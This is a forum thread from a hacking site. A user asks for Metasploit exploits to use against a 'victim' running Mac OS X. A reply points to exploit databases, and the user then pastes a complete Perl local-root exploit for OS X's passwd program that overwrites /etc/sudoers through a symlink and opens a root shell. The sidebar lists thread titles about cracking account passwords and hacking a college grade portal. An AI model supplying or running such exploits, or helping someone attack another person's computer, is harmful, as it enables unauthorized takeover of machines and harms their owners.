Well, I started to use metasploit and I tried to search some exploits for Mac OS X Yosemite, but there were nothing. Is the OS too safe to get hacked with metasploit or what's the problem? I really want to solve this problem, cause my victims Computer is running on OSX. Any Ideas?
Forum Thread: Any Exploits for Mac OSX?
- Hot
- Active
-
Forum Thread:
Hacking Facebook,Twitter,Instagram Account Passwords with BruteForce
123
Replies
38 min ago -
Forum Thread:
Diffrent Ways of Getting Ip Addresses
1
Replies
44 min ago -
Forum Thread:
How Can I Hack in Our Students Portal and Be Able to Fix My Results and Edit Some
3
Replies
2 hrs ago -
Forum Thread:
How can i Port Forward for WAN Attacks in Kali Linux HELP
44
Replies
2 hrs ago -
Forum Thread:
Clean DarkComet Download
1
Replies
16 hrs ago -
Forum Thread:
How to Hack My College Website ?
25
Replies
16 hrs ago -
Forum Thread:
How to Fix 'Failed to Detect and Mount CD-ROM' Problem When Installing Kali Linux
10
Replies
17 hrs ago -
Forum Thread:
Tp-Link wn8200nd
0
Replies
19 hrs ago -
Forum Thread:
Kali Linux Wifi Adapter & Interfaces Not Showing Up
1
Replies
1 day ago -
Forum Thread:
How to log in tor
2
Replies
1 day ago -
Forum Thread:
I packed many documents in zip archive yesterday evening
1
Replies
2 days ago -
Fluxion :
Cracking Wifi Without Bruteforce or Wordlist in Kali Linux 2017.1. [Full Guide]
3
Replies
2 days ago -
Forum Thread:
Any Scripts/Programs Available for the Krack Vulnerability
0
Replies
2 days ago -
Forum Thread:
Can Someone Here Help Me Crack Tgis Site and Be Able to Change My Transcript/Exam Results
0
Replies
3 days ago -
Forum Thread:
Any Idea About Piping Crunch with Medusa
0
Replies
3 days ago -
Forum Thread:
Cannot Connect to Fake Ap in Airgeddon. I tried with evil twin attack and can't key in password. Please help me.
0
Replies
3 days ago -
Forum Thread:
Commercial Mattress Cleaning Services
1
Replies
3 days ago -
Forum Thread:
How to Download Videos with Terminal
7
Replies
3 days ago -
Forum Thread:
I Need Help in Hacking a Gmail Account.
23
Replies
3 days ago -
Forum Thread:
Exploit Completed but No Session Was Created .
5
Replies
4 days ago
-
How To:
Use MDK3 for Advanced Wi-Fi Jamming
-
Hacking macOS:
How to Sniff Passwords on a Mac in Real Time, Part 1 (Packet Exfiltration)
-
How To:
4 Ways to Crack a Facebook Password & How to Protect Yourself from Them
-
How To:
Use U2F Security Keys on Your Smartphone to Access Your Google Account with Advanced Protection
-
How To:
Get Unlimited Free Trials Using a "Real" Fake Credit Card Number
-
Hack Like a Pro:
How to Hack Facebook (Facebook Password Extractor)
-
How To:
Hack Wi-Fi & Networks More Easily with Lazy Script
-
How To:
Hack WPA & WPA2 Wi-Fi Passwords with a Pixie-Dust Attack Using Airgeddon
-
How To:
Buy the Best Wireless Network Adapter for Wi-Fi Hacking in 2018
-
How to Hack Wi-Fi:
Get Anyone's Wi-Fi Password Without Cracking Using Wifiphisher
-
How To:
Use Maltego to Monitor Twitter for Disinformation Campaigns
-
How To:
Use Command Injection to Pop a Reverse Shell on a Web Server
-
How To:
Crack Any Master Combination Lock in 8 Tries or Less Using This Calculator
-
Hacking macOS:
How to Sniff Passwords on a Mac in Real Time, Part 2 (Packet Analysis)
-
How To:
Beginner's Guide to OWASP Juice Shop, Your Practice Hacking Grounds for the 10 Most Common Web App Vulnerabilities
-
How To:
Hack Android Using Kali (Remotely)
-
How To:
Crack Wi-Fi Passwords with Your Android Phone and Get Free Internet!
-
How To:
Find Anyone's Private Phone Number Using Facebook
-
How to Hack Wi-Fi:
Cracking WPA2-PSK Passwords Using Aircrack-Ng
-
How To:
Hack 200 Online User Accounts in Less Than 2 Hours (From Sites Like Twitter, Reddit & Microsoft)
4 Responses
There are numerous exploits for OS X in Metasploit. Look again. In addition, check exploitdb for exploits or securityfocus.com. There are numerous exploits for OS X. It is far from safe!
Yeah, thanks. But with which kind of program do I use script like this:
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
#!/usr/bin/perl
#
# /usr/bin/passwdOSX: local root exploit.
#
# by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)
#
# (Apple) OSX's /usr/bin/passwd program has support for a custom
# passwd file to be used instead of the standard/static path. this
# feature has security issues in the form of editable file(s) being
# made anywheres on the disk and also writing arbitrary data to files.
#
# the first issue will only work if the file does not already exist,
# it is done using "umask 0;/usr/bin/passwd -i file -l <filename>".
# the second issue is once a successful password change has occured
# /usr/bin/passwd will insecurely re-write the passwd file to
# /tmp/.pwtmp.<pid>, which can be predicted and linked to a file of
# your choice. (this exploits the second issue to overwrite
# /etc/sudoers)
#
# (for some reason this took apple 6 or so months to patch)
use POSIX;
$fakepasswd="/tmp/xpasswd.$$";
$passwdpid=($$ + 1);
$passwdtempfile="/tmp/.pwtmp.$passwdpid";
$sudoers="/etc/sudoers";
sub pexit{print("! @.\n");exit(1);}
print("* /usr/bin/passwdOSX: local root exploit.\n");
print("* by: vade79/v9 v9\@fakehalo.us (fakehalo/realhalo)\n\n");
unlink($fakepasswd);
print("* making fake password file. ($fakepasswd)\n");
open(FP,">$fakepasswd")||pexit("couldn't open/write to $fakepasswd");
# uid must equal the current user.
print(FP "ALL ALL=(ALL) ALL #::" . getuid . ":" . getuid . "::" .
getuid . ":" . getuid . "::/:/\n");
close(FP);
print("* sym-linking $sudoers -> $passwdtempfile.\n");
symlink($sudoers,$passwdtempfile)||pexit("couldn't link files.");
print("* running /usr/bin/passwd on $fakepasswd.\n");
print("* (use ANY password longer than 4 characters)\n\n");
system("/usr/bin/passwd -i file -l $fakepasswd \"ALL ALL=(ALL) ALL #\"");
print("\n* running \"sudo sh\", use your REAL (user) password.\n\n");
system("/usr/bin/sudo sh");
exit(0);
That is a Perl script.
Security Focus is what I use. Sometimes they have the exploits already there.
Share Your Thoughts